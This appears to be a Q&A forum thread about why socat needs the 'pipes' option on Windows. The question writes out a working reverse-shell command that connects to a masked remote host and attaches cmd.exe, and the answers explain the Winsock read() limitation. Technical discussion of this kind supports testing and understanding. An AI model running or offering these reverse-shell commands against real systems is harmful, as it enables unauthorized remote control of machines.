5

Trying to create a reverse shell, I used this one my windows box:
socat -d -d TCP4:X.X.X.X:789 EXEC:'cmd.exe'

which failed with the following error: "The process tried to write to a nonexistent pipe."

Using the pipes option, it now works: socat -d -d TCP4:X.X.X.X:789 EXEC:'cmd.exe',pipes

My question is why pipes is necessary?

I know that pipes options will use named pipes instead of the default UNIX socket.
I am assuming that the default behavior is different in the windows implementation

Moha the almighty camel
  • 195

2 Answers2

3

The pipes option is used to force cmd.exe or powershell to use Unix style standard input and output.

ComputerUser121212
  • 754
T K
  • 31
1

I cannot tell about cmd.exe but about bash.exe/sh.exe.

On windows the network socket has one file descriptor which doesn't allow for read() calls. (see https://stackoverflow.com/questions/4778043/winsock-not-supporting-read-write but on my system write() seems to work)

bash.exe inherits that network connection (one file descriptor) and uses write() and read() which then fails. In Linux this would work, see https://man7.org/linux/man-pages/man2/recv.2.html

"The only difference between recv() and read(2) is the presence of flags.-"

Invoked with ,pipes socat will enter a bidirectional copy loop which operates on two unnamed pipes. bash.exe inherits that two artificial pipe ends (file descriptors) and works well because for pipes you actually can use read() and write().

jifb
  • 121